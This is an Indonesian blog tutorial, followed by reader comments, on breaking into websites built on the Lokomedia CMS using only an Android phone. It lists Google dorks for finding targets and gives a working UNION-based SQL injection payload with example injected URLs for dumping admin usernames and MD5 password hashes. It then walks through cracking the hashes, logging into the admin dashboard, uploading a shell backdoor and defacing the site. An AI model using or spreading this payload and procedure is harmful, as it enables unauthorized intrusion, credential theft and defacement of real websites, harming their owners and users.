Deface Sql Lokomedia By Android

Berhubung banyak yang bertanya Bagaimana sii ka cara sql lokomedia dari android?
Emm...
So ????
Gw share lah tutorialnya kali ini 😂


Ok Langsung aja yah Kita ketutorialnya

Bahan : 
- PC/Hp Android yg ada kouta internet
- Drok
- Eksploit
- Hash Md5
- Shell Backdoor 
- Script Deface

Drok :
- inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
- inurl:kategori-23-hiburan.html
- inurl:hal-tentang-kami.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(Selebihnya Kembangin Lagi yah 😊)

Eksploit : 
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Hash Md5 Klik

Kalo kalian belum punya Shell Backdoor, Bisa langsung Download Disini

Trus Klo Kalian Juga belum punya script Deface, kalian jg bisa Download Disini

Langkah Langkah :
1. Kalian Dorking aja dulu Drok diatas


2. Pilih Targetnya


3. Setelah itu Tambahkan eksploit diatas dibelakang angka target. 
Contoh : http://www.target.com/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Kalo Sudah maka akan seperti ini


4. Kalo sudah seperti itu tinggal kalian cek source ditargetnya
Tinggal kalian tambahkan view-source: dibelakang target
Contoh : view-source:www.target.com/statis-1'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html


5. Nah kalo sudah seperti ini tinggal kalian cari saja deh username sama pass admin 😁
Cari yg seperti ini


6. Hash Password Md5
Karna Disitu passwordnya Berwujud Md5, maka kita harus hash dulu password tersebut 😑
Hashnya Disini

Caranya tinggal kalian tempel and submit ajj nanti klo sukses maka akan muncul password tersebut

7. Kalo Sudah ketemu user name sama passnya, kemudian tinggal kalian login ajj deh dengan user name dan password yg telah dihash tadi 😁


8. Kalo Sudah login maka akan masuk kedashboard admin tersebut


Kalo sudah masuk dashbord admin Sekarang tinggal terserah dari kalian, mau ditanam shell atau diedit page adminnya 😁

9. Kalo mau ditanam shell sekarang tinggal kalian cari saja tempat upload, seperti digalery website, dialbum website, di file dll
Lalu kalian upload shell kalian disitu

Kalo disini gw coba upload di banner website


Nahh disitu tinggal kalian upload saja shell kalian atau script deface kalian 😁



Kalo sudah terupload maka tinggal kalian tekan saja shell backdoor yg kalian upload tersebut, biasanya kalo diandro perintahnya (buka gambar ditab baru) 😁

Kalo sukses maka akan masuk shell backdoor kalian 😁


Kalo sudah seperti ini Jadi tinggal terserah dari kalian, Mau ditebas indexnya kah, atau titip file kah, sekarang semuanya kembali lagi kepada kalian 😁

Ok sekian dari gw Nurmala
Kurang lebihnya mohon maaf, kalo ada pertanyaan silahkan kalian komentar saja dibawah yah
Trimakasih 😁🙏

Comments

  1. nyari admin login panel nya.dimana ?

    ReplyDelete
  2. Cari sndirilah bang itu sdh ngasih tutor

    ReplyDelete
  3. Kalo untuk mencari login adminnya bisa dicoba cara dorking admin, atau lwt terminal commant python/perl

    ReplyDelete
  4. Yaelah kasih tutorial nanggung bener kaga kasih tau admin loginnya di mana

    ReplyDelete
  5. Itu Cara View Source nya pencet apa bang ?

    ReplyDelete

Post a Comment

Popular posts from this blog

Deface Bypass Admin Terbaru 2018

Cara Menjalankan Sql injection Ditermux

Deface Webdav With Apk Exploiter